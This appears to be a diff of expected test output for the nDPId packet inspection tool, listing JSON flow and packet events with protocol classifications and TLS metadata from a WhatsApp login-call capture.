-00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582331561,"flow_last_seen":1432582331561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582331561,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.39","src_port":49197,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1432582331561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331561,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAowcFAAEAGFpTAqAIEEaeOJ8AtAbtkgHfvejCYYFAR\/\/+cbwAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1432582331698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331698,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xwAAO0GcDgRp44nwKgCBAG7wC16MJhgZIB38FARn\/78bwAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1432582331825,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331825,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo40dAAEAG9Q3AqAIEEaeOJ8AtAbtkgHfwejCYYVAQ\/\/6cbwAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582355253,"flow_last_seen":1432582355253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582355253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1432582355253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582355253,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAz7ZAAEAGVELAqAIEEa1CZsA1Abt+ckUjAAAAALAC\/\/9LOwAAAgQFtAEDAwQBAQgKLfwhgQAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1432582355393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582355393,"pkt":"APS5Jrv0xiwDYGpkCABFAAA009MAAO8G4TARrUJmwKgCBAG7wDWkxiaffnJFJIASH\/7nbQAAAgQFoAEDAwQBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1432582355478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582355478,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoTu9AAEAG1SHAqAIEEa1CZsA1Abt+ckUkpMYmoFAQQAAIJwAA"} +00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 